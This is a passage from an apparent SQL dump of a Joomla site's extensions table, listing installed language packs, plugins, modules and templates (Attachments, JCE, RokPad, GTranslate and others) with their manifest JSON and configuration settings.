3.9.6\",\"group\":\"\",\"filename\":\"install\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10029,0,'Russian (ru-RU) Language Pack','package','pkg_ru-RU','',0,1,1,0,'{\"name\":\"Russian (ru-RU) Language Pack\",\"type\":\"package\",\"creationDate\":\"2019-05-20\",\"author\":\"Russian Translation Team\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"smart@joomlaportal.ru\",\"authorUrl\":\"www.joomlaportal.ru\",\"version\":\"3.9.6.2\",\"description\":\"Joomla 3.9 Russian Language Package\",\"group\":\"\",\"filename\":\"pkg_ru-RU\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10037,0,'YJK2FilterPack','package','pkg_YJK2FilterPack','',0,0,1,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10049,0,'PLG_SYS_ADMINEXILE','plugin','adminexile','system',0,0,1,0,'{\"name\":\"PLG_SYS_ADMINEXILE\",\"type\":\"plugin\",\"creationDate\":\"Jan 2011\",\"author\":\"Michael Richey\",\"copyright\":\"Copyright (C) 2011 Michael Richey. All rights reserved.\",\"authorEmail\":\"adminexile@richeyweb.com\",\"authorUrl\":\"http:\\/\\/www.richeyweb.com\",\"version\":\"1.15\",\"description\":\"PLG_SYS_ADMINEXILE_XML_DESC\",\"group\":\"\",\"filename\":\"adminexile\"}','{\"key\":\"tabaka\",\"twofactor\":\"0\",\"keyvalue\":\"ROCKS\",\"redirect\":\"{404}\",\"fourofour\":\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/IETF\\/\\/DTD HTML 2.0\\/\\/EN\\\">\\r\\n<html><head>\\r\\n<title>404 Not Found<\\/title>\\r\\n<\\/head><body>\\r\\n<h1>Not Found<\\/h1>\\r\\n<p>The requested URL {url} was not found on this server.<\\/p>\\r\\n<hr>\\r\\n{serversignature}\\r\\n<\\/body><\\/html>\",\"frontrestrict\":\"0\",\"maillink\":\"1\",\"maillinkgroup\":[\"8\"]}','','',0,'0000-00-00 00:00:00',0,0),(10113,0,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10116,0,'plg_content_attachments','plugin','attachments','content',0,1,1,0,'{\"name\":\"plg_content_attachments\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_ATTACHMENTS_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10117,0,'plg_search_attachments','plugin','attachments','search',0,1,1,0,'{\"name\":\"plg_search_attachments\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_ATTACHMENTS_SEARCH_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments\"}','{\"search_limit\":\"50\"}','','',0,'0000-00-00 00:00:00',0,0),(10118,0,'plg_attachments_plugin_framework','plugin','attachments_plugin_framework','attachments',0,1,1,0,'{\"name\":\"plg_attachments_plugin_framework\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2009-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_ATTACHMENTS_FOR_COMPONENTS_PLUGIN_FRAMEWORK_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments_plugin_framework\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10119,0,'plg_attachments_for_content','plugin','attachments_for_content','attachments',0,1,1,0,'{\"name\":\"plg_attachments_for_content\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2009-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_ATTACHMENTS_FOR_CONTENT_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments_for_content\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10120,0,'plg_system_show_attachments_in_editor','plugin','show_attachments','system',0,1,1,0,'{\"name\":\"plg_system_show_attachments_in_editor\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2011-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_SHOW_ATTACHMENTS_IN_EDITOR_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"show_attachments\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10121,0,'plg_editors-xtd_add_attachment_btn','plugin','add_attachment','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_add_attachment_btn\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_ADD_ATTACHMENT_BUTTON_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"add_attachment\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10122,0,'plg_editors-xtd_insert_attachments_token_btn','plugin','insert_attachments_token','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_insert_attachments_token_btn\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"ATTACH_INSERT_ATTACHMENTS_TOKEN_BUTTON_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"insert_attachments_token\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10123,0,'plg_quickicon_attachments','plugin','attachments','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_attachments\",\"type\":\"plugin\",\"creationDate\":\"March 26, 2018\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2018 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.6\",\"description\":\"PLG_QUICKICON_ATTACHMENTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments\"}','{\"context\":\"mod_quickicon\"}','','',0,'0000-00-00 00:00:00',0,0),(10124,0,'com_attachments','component','com_attachments','',1,1,0,0,'{\"name\":\"com_attachments\",\"type\":\"component\",\"creationDate\":\"March 20, 2015\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2015 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments3\\/\",\"version\":\"3.2.3\",\"description\":\"ATTACH_ATTACHMENTS_COMPONENT_DESCRIPTION\",\"group\":\"\",\"filename\":\"attachments\"}','{\"publish_default\":\"0\",\"auto_publish_warning\":\"\",\"default_access_level\":\"1\",\"user_field_1_name\":\"\",\"user_field_2_name\":\"\",\"user_field_3_name\":\"\",\"max_filename_length\":0,\"attachments_placement\":\"end\",\"allow_frontend_access_editing\":\"0\",\"show_column_titles\":\"0\",\"show_description\":\"1\",\"show_creator_name\":\"0\",\"show_file_size\":\"1\",\"show_downloads\":\"0\",\"show_created_date\":\"0\",\"show_modified_date\":\"0\",\"date_format\":\"Y-m-d H:i\",\"sort_order\":\"filename\",\"hide_on_frontpage\":\"0\",\"hide_with_readmore\":\"0\",\"hide_on_blogs\":\"0\",\"hide_except_article_views\":\"0\",\"always_show_category_attachments\":\"0\",\"show_guest_access_levels\":[\"1\"],\"hide_add_attachments_link\":\"0\",\"max_attachment_size\":0,\"forbidden_filename_characters\":\"#=?%&\",\"attachments_table_style\":\"attachmentsList\",\"file_link_open_mode\":\"in_same_window\",\"attachments_titles\":\"\",\"link_check_timeout\":\"10\",\"superimpose_url_link_icons\":\"1\",\"suppress_obsolete_attachments\":\"0\",\"login_url\":\"index.php?option=com_users&view=login\",\"register_url\":\"index.php?option=com_users&view=registration\",\"secure\":\"0\",\"download_mode\":\"inline\"}','','',0,'0000-00-00 00:00:00',0,0),(10125,0,'pkg_attachments','package','pkg_attachments','',0,1,1,0,'{\"name\":\"pkg_attachments\",\"type\":\"package\",\"creationDate\":\"March 20, 2015\",\"author\":\"Jonathan M. Cameron\",\"copyright\":\"(C) 2007-2015 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"http:\\/\\/joomlacode.org\\/gf\\/project\\/attachments\\/\",\"version\":\"3.2.3\",\"description\":\"ATTACH_PACKAGE_ATTACHMENTS_FOR_JOOMLA_16PLUS\",\"group\":\"\",\"filename\":\"pkg_attachments\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10126,0,'attachments_ru_ru_language_pack','file','attachments_ru_ru_language_pack','',0,1,0,0,'{\"name\":\"attachments_ru_ru_language_pack\",\"type\":\"file\",\"creationDate\":\"2015-03-20\",\"author\":\"Jonathan M. Cameron, Sergey Litvintsev (serge_li@ukr.net, 2.0-3.2), Yarik Sharoiko (1.3.4)\",\"copyright\":\"Copyright (C) 2011-2015 Jonathan M. Cameron. All rights reserved.\",\"authorEmail\":\"jmcameron@jmcameron.net\",\"authorUrl\":\"\",\"version\":\"3.2.0\",\"description\":\"ATTACHMENTS_RU_RU_LANGUAGE_PACK\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10128,0,'Счетчик посещений','module','mod_jvcounter','',0,1,0,0,'{\"name\":\"\\u0421\\u0447\\u0435\\u0442\\u0447\\u0438\\u043a \\u043f\\u043e\\u0441\\u0435\\u0449\\u0435\\u043d\\u0438\\u0439\",\"type\":\"module\",\"creationDate\":\"\\u0410\\u043f\\u0440\\u0435\\u043b\\u044c 2013\",\"author\":\"Open Source Code Solutions Co\",\"copyright\":\"Copyright \\u00a9 2012-2013 joomlaschetchik.ru\",\"authorEmail\":\"joomlashetchik@ya.ru\",\"authorUrl\":\"http:\\/\\/joomlaschetchik.ru\\/\",\"version\":\"3.0.2\",\"description\":\"\\u041c\\u043e\\u0434\\u0443\\u043b\\u044c \\u0441\\u0442\\u0430\\u0442\\u0438\\u0441\\u0442\\u0438\\u043a\\u0438 \\u043f\\u043e\\u0441\\u0435\\u0449\\u0435\\u043d\\u0438\\u0439 joomlaschetchik.ru.\",\"group\":\"\",\"filename\":\"mod_jvcounter\"}','{\"headertext\":\"\",\"startofcounter\":\"0\",\"numberofdigits\":\"5\",\"digittype\":\"\",\"template\":\"\",\"themes\":\"\",\"textonline\":\"\\u041d\\u0430 \\u0441\\u0430\\u0439\\u0442\\u0435\",\"texttoday\":\"\\u0421\\u0435\\u0433\\u043e\\u0434\\u043d\\u044f\",\"textyesterday\":\"\\u0412\\u0447\\u0435\\u0440\\u0430\",\"textthisweek\":\"\\u041d\\u0430 \\u044d\\u0442\\u043e\\u0439 \\u043d\\u0435\\u0434\\u0435\\u043b\\u0438\",\"textlastweek\":\"\\u041d\\u0430 \\u043f\\u0440\\u043e\\u0448\\u043b\\u043e\\u0439 \\u043d\\u0435\\u0434\\u0435\\u043b\\u0438\",\"textthismonth\":\"\\u042d\\u0442\\u043e\\u0442 \\u043c\\u0435\\u0441\\u044f\\u0446\",\"textlastmonth\":\"\\u041f\\u0440\\u043e\\u0448\\u043b\\u044b\\u0439 \\u043c\\u0435\\u0441\\u044f\\u0446\",\"textalldays\":\"\\u0417\\u0430 \\u0432\\u0441\\u0435 \\u0432\\u0440\\u0435\\u043c\\u044f\",\"startdaycounter\":\"\",\"showonline\":\"1\",\"showtoday\":\"1\",\"showyesterday\":\"1\",\"showthisweek\":\"1\",\"showlastweek\":\"1\",\"showthismonth\":\"1\",\"showlastmonth\":\"1\",\"showalldays\":\"1\",\"showip\":\"1\",\"showdatetoday\":\"1\",\"datetodayformat\":\"Y-m-d\"}','','',0,'0000-00-00 00:00:00',0,0),(10129,0,'Счетчик посещений','package','pkg_jvcounter','',0,1,1,0,'{\"name\":\"\\u0421\\u0447\\u0435\\u0442\\u0447\\u0438\\u043a \\u043f\\u043e\\u0441\\u0435\\u0449\\u0435\\u043d\\u0438\\u0439\",\"type\":\"package\",\"creationDate\":\"\\u0410\\u043f\\u0440\\u0435\\u043b\\u044c 2013\",\"author\":\"Open Source Code\",\"copyright\":\"Copyright \\u00a9 2012-2013 joomlaschetchik.ru\",\"authorEmail\":\"joomlashetchik@ya.ru\",\"authorUrl\":\"http:\\/\\/joomlaschetchik.ru\\/\",\"version\":\"3.0\",\"description\":\"\\u0423\\u0441\\u0442\\u0430\\u043d\\u043e\\u0432\\u043a\\u0430 Joomla \\u0441\\u0447\\u0435\\u0442\\u0447\\u0438\\u043a\\u0430.\",\"group\":\"\",\"filename\":\"package\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10131,0,'RokPad','plugin','rokpad','editors',0,1,1,0,'{\"name\":\"RokPad\",\"type\":\"plugin\",\"creationDate\":\"July 24, 2018\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2018 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.1.10\",\"description\":\"\\n        <div class=\\\"rokpad-description\\\">\\n        <img src=\\\"..\\/plugins\\/editors\\/rokpad\\/assets\\/admin\\/images\\/rokpad.jpg\\\" class=\\\"img-padding\\\" \\/><h1>RokPad<\\/h1>\\n        <h2>The Power of Desktop Text Editor in a Joomla!<\\/h2>\\n        <p>Ever wished you could use a powerful desktop text editor such as Textmate, SublimeText, or UltraEdit directly on a Joomla! web site?  Now with RokPad we provide many features and capabilities that traditionally would only be found in a powerful desktop editor.  RokPad provides advanced functions such as an Ajax saving action, syntax highlighting, configurable themes, multiple cursors and selections, shortcut keys, multiple language support, and many other incredible features.<\\/p>\\n\\n        <h2>Key Features:<\\/h2>\\n        <ul class=\\\"features\\\">\\n\\t\\t\\t<li>Code Highlighter built on the great ACE Editor<\\/li>\\n\\t        <li>Support for CSS, HTML, JavaScript, JSON, LESS, Markdown, PHP, SQL, Plain Text, Textile, XML and more...<\\/li>\\n\\t        <li>Ajax save and Automatic Save options. You\'ll never loose your content again, nor wait until the page has finished reloading after a save!<\\/li>\\n\\t        <li>Save, Undo, Redo, Goto line, Advanced Search and Search &amp; Replace, Full Screen. Settings like Themes, Font Size, Code Folding, Wrap Mode, Invisible Characters, Print Margin, Highlight of selected word<\\/li>\\n\\t        <li>26 Themes to choose from<\\/li>\\n\\t        <li>Resizable Editor by dragging the Statusbar<\\/li>\\n\\t        <li>Keyboard shortcuts<\\/li>\\n\\t        <li>Brackets match<\\/li>\\n\\t        <li>Multiple cursors and selections<\\/li>\\n\\t        <li>Vertical Selection<\\/li>\\n\\t        <li>Ability to insert at multiple locations xtd-buttons shortcodes, all at once.<\\/li>\\n\\t        <li>Shortcodes and Universal Tag Insertion<\\/li>\\n\\t        <li>Drag &amp; Drop of text from external applications such as other Browser Tabs\\/windows or Native Applications (Supported on Firefox, Chrome, IE10 and Safari)<\\/li>\\n\\t        <li>Import local files by Drag &amp; Drop directly from your desktop! (Supported on Firefox, Chrome, IE10 and Safari 6+)<\\/li>\\n\\t        <li>And much more!<\\/li>\\n        <\\/ul>\\n        <\\/div>\\n        \",\"group\":\"\",\"filename\":\"rokpad\"}','{\"autosave-enabled\":\"0\",\"autosave-time\":\"5\",\"theme\":\"fluidvision\",\"font-size\":\"12px\",\"fold-style\":\"markbeginend\",\"use-wrap-mode\":\"free\",\"selection-style\":\"1\",\"highlight-active-line\":\"1\",\"highlight-selected-word\":\"1\",\"show-invisibles\":\"0\",\"show-gutter\":\"1\",\"show-print-margin\":\"1\",\"fade-fold-widgets\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(10132,0,'rp4c473bd798d68b1d7fa5bc8ee3da2u','file','rp4c473bd798d68b1d7fa5bc8ee3da2u','',0,1,0,0,'{\"name\":\"rp4c473bd798d68b1d7fa5bc8ee3da2u\",\"type\":\"file\",\"creationDate\":\"24\\/12\\/2015\",\"author\":\"JoomLang\",\"copyright\":\"Copyright \\u00a9 2012 -2015 www.joomlang.ru. \\u0412\\u0441\\u0435 \\u043f\\u0440\\u0430\\u0432\\u0430 \\u0437\\u0430\\u0449\\u0438\\u0449\\u0435\\u043d\\u044b.\",\"authorEmail\":\"pochta@joomlang.ru\",\"authorUrl\":\"http:\\/\\/www.joomlang.ru\",\"version\":\"2.1.9v2\",\"description\":\"\\u0420\\u0443\\u0441\\u0438\\u0444\\u0438\\u043a\\u0430\\u0442\\u043e\\u0440 \\u0440\\u0435\\u0434\\u0430\\u043a\\u0442\\u043e\\u0440\\u0430 RokPad 2.1.9\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10133,10230,'COM_JCE','component','com_jce','',1,1,0,0,'{\"name\":\"COM_JCE\",\"type\":\"component\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"COM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10134,10230,'plg_editors_jce','plugin','jce','editors',0,1,1,0,'{\"name\":\"plg_editors_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"WF_EDITOR_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10139,0,'joombig images 3d space cloud','module','mod_joombig_images_3d_space_cloud','',0,1,0,0,'{\"name\":\"joombig images 3d space cloud\",\"type\":\"module\",\"creationDate\":\"Mar 2014\",\"author\":\"joombig.com\",\"copyright\":\"Copyright (C) 2014 joombig.com. All rights reserved.\",\"authorEmail\":\"support@joombig.com\",\"authorUrl\":\"www.joombig.com\",\"version\":\"1.1\",\"description\":\"MODULE_DESC\",\"group\":\"\",\"filename\":\"mod_joombig_images_3d_space_cloud\"}','{\"moduleclass_sfx\":\"\",\"width\":\"960\",\"height\":\"285\",\"path\":\"\",\"setbackgroundcolor\":\"1\",\"backgroundcolor\":\"#ffffff\",\"speed\":\"300\",\"displaytitleimages\":\"1\",\"textcolor\":\"#b9ecf0\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10140,10230,'plg_system_jce','plugin','jce','system',0,1,1,0,'{\"name\":\"plg_system_jce\",\"type\":\"plugin\",\"creationDate\":\"29-10-2020\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2020 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.1\",\"description\":\"PLG_SYSTEM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10141,0,'AnyCode','module','mod_anycode','',0,1,0,0,'{\"name\":\"AnyCode\",\"type\":\"module\",\"creationDate\":\"August 2012\",\"author\":\"Hyde-Design\",\"copyright\":\"2012\",\"authorEmail\":\"sales@hyde-design.co.uk\",\"authorUrl\":\"www.hyde-design.co.uk\",\"version\":\"3.0\",\"description\":\"A simple Module to enable you to embed any code within a module position without fear of the code being stripped.\",\"group\":\"\",\"filename\":\"mod_anycode\"}','{\"@spacer_general\":\"Enter your code below, it will be rendered as is.\",\"anycode\":\"\",\"urlsniffer\":\"\",\"browsersniffer\":\"all\"}','','',0,'0000-00-00 00:00:00',0,0),(10142,0,'PLG_SYSTEM_MODULESANYWHERE','plugin','modulesanywhere','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_MODULESANYWHERE\",\"type\":\"plugin\",\"creationDate\":\"May 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2021 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/regularlabs.com\",\"version\":\"7.13.3\",\"description\":\"PLG_SYSTEM_MODULESANYWHERE_DESC\",\"group\":\"\",\"filename\":\"modulesanywhere\"}','','','',0,'0000-00-00 00:00:00',0,0),(10143,0,'PLG_EDITORS-XTD_MODULESANYWHERE','plugin','modulesanywhere','editors-xtd',0,1,1,0,'{\"name\":\"PLG_EDITORS-XTD_MODULESANYWHERE\",\"type\":\"plugin\",\"creationDate\":\"May 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2021 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/regularlabs.com\",\"version\":\"7.13.3\",\"description\":\"PLG_EDITORS-XTD_MODULESANYWHERE_DESC\",\"group\":\"\",\"filename\":\"modulesanywhere\"}','','','',0,'0000-00-00 00:00:00',0,0),(10152,0,'JE Weather','module','mod_je_weather','',0,1,0,0,'{\"name\":\"JE Weather\",\"type\":\"module\",\"creationDate\":\"2012 October\",\"author\":\"jExtensions.com\",\"copyright\":\"jExtensions.com\",\"authorEmail\":\"support@jExtensions.com\",\"authorUrl\":\"www.jExtensions.com\",\"version\":\"2.5.0\",\"description\":\"\\n\\t\\n\\t<h1>JE Weather Module<\\/h1>\\n\\t\\n\\t<div style=\\\"margin:0 0 0 10px; font-size:15px;\\\">\\n\\t<h2>Search for City Codes on <a href=\\\"http:\\/\\/weather.yahoo.com\\/\\\" target=\\\"_blank\\\">Yahoo.com<\\/a> or <a href=\\\"http:\\/\\/www.weather.com\\/\\\" target=\\\"_blank\\\">Weather.com<\\/a><\\/h2>\\n\\tDownload more free extensions at <a href=\\\"http:\\/\\/jextensions.com\\\" target=\\\"_blank\\\">jExtensions.com<\\/a>;\\n\\t<br\\/><br\\/>Get support for this Joomla module on the official <a href=\\\"http:\\/\\/jextensions.com\\/joomla-weather-module\\/\\\" target=\\\"_blank\\\">JE Weather Module<\\/a> page.<\\/div><br\\/>\\n\\t<div style=\\\"margin:0 0 0 10px; font-size:11px;\\\">Credits: <a href=\\\"http:\\/\\/www.zazar.net\\/developers\\/jquery\\/zweatherfeed\\/\\\" target=\\\"_blank\\\" >Yahoo Weather<\\/a><\\/div>\\n\\t<br\\/>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"mod_je_weather\"}','{\"jQuery\":\"1\",\"moduleclass_sfx\":\"\",\"woeid\":\"false\",\"cityCode\":\"UKXX0085\",\"unit\":\"c\",\"image\":\"true\",\"country\":\"false\",\"highlow\":\"true\",\"wind\":\"true\",\"humidity\":\"false\",\"visibility\":\"false\",\"sunrise\":\"false\",\"sunset\":\"false\",\"forecast\":\"false\",\"forecastlink\":\"false\",\"textColor\":\"#333333\",\"oddColor\":\"#eeeeee\",\"evenColor\":\"#dddddd\"}','','',0,'0000-00-00 00:00:00',0,0),(10153,0,'GTranslate','module','mod_gtranslate','',0,1,0,0,'{\"name\":\"GTranslate\",\"type\":\"module\",\"creationDate\":\"September 2010\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (C) 2008 - 2020 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"edo888@gmail.com\",\"authorUrl\":\"https:\\/\\/gtranslate.io\",\"version\":\"3.7.6\",\"description\":\"\\n    \\n    <span style=\'font-weight:normal;text-align:left;font-size:120%;line-height:1.5;\'>\\n    <p>GTranslate - Makes your website multilingual and available to the world.<\\/p>\\n    <p><i>Ugrade your <a href=\\\"https:\\/\\/gtranslate.io\\/?xyz=997#pricing\\\" target=\\\"_blank\\\">GTranslate<\\/a> to a paid plan and enable the following features:<\\/i><\\/p>\\n    <ul>\\n        <li><strong>Enable search engine indexing<\\/strong> - Search engines will index your translated pages which will increase international traffic.<\\/li>\\n        <li><strong>Neural machine translations<\\/strong> - Human level translation quality.<\\/li>\\n        <li><strong>Search engine friendly<\\/strong> - The URL will change depending on a selected language e.g. <b>es.domain.com<\\/b> or <b>domain.com\\/es\\/<\\/b> for Spanish.<\\/li>\\n        <li><strong>Meta data translation<\\/strong> - Meta keywords and description will be translated which will increase translated keywords ranking in the search engines.<\\/li>\\n        <li><strong>Ability to edit translations<\\/strong> - You will be able to edit the translated texts directly from the front-end.<\\/li>\\n        <li><strong>Cache support<\\/strong> - Translations will be cached and make your translated pages to load faster.<\\/li>\\n        <li><strong><a href=\\\"https:\\/\\/gtranslate.io\\/#faq\\\" target=\\\"_blank\\\">Translation Delivery Network<\\/a><\\/strong> - The translations will be delivered by our cloud network. No software is installed on your server.<\\/li>\\n        <li><strong>Centralized translation cache<\\/strong> - The quality of the translations cache will improve over time by using crowd sourced and professional translations.<\\/li>\\n        <li><strong>Seamless updates<\\/strong> - We care about further updates. You just enjoy the up to date service every day.<\\/li>\\n        <li><strong>URL Translation<\\/strong> - The URL will be translated which is very important for multilingual SEO.<\\/li>\\n        <li><strong>Ability to edit translated URLs<\\/strong> - You will be able to change the translated URL manually.<\\/li>\\n        <li><strong>Language hosting<\\/strong> - Host your language on top level country domain name to rank higher on local search engines results (ccTLD <b>domain.es<\\/b>).<\\/li>\\n        <li><strong><a href=\\\"https:\\/\\/gtranslate.io\\/website-translation-quote\\\" target=\\\"_blank\\\">Professional translations<\\/a><\\/strong> - Automatic translation post-editing service and professional translations are available on demand.<\\/li>\\n        <li><strong>Live chat support<\\/strong> - We are ready to help you with any questions you may have.<\\/li>\\n    <\\/ul>\\n\\n    <p><a href=\'https:\\/\\/gtranslate.io\\/?xyz=997#pricing\' target=\'_blank\' class=\'btn btn-large btn-success\'><i class=\'icon-info-2\'><\\/i> Plans &amp; Pricing<\\/a> &nbsp; <a href=\'https:\\/\\/gtranslate.io\\/?xyz=997#faq\' target=\'_blank\' class=\'btn btn-large btn-primary\'><i class=\'icon-info\'><\\/i> FAQ<\\/a> &nbsp; <a href=\'https:\\/\\/gtranslate.io\\/docs\\/54-joomla-module-documentation\' target=\'_blank\' class=\'btn btn-large btn-info\'><i class=\'icon-support\'><\\/i> Documentation<\\/a> &nbsp; <a href=\'http:\\/\\/extensions.joomla.org\\/extensions\\/extension\\/languages\\/automatic-translations\\/gtranslate#reviews\' target=\'_blank\' class=\'btn btn-large btn-warning\'><i class=\'icon-comments\'><\\/i> Reviews<\\/a><\\/p>\\n    <p><b>Version: 3.7.6<\\/b><br\\/>Copyright &copy; 2008 - 2020 GTranslate Inc, All rights reserved. <a href=\'https:\\/\\/gtranslate.io\\/?xyz=997\' target=\'_blank\'><b>http:\\/\\/gtranslate.io<\\/b><\\/a><\\/p>\\n    <\\/span>\\n    \\n    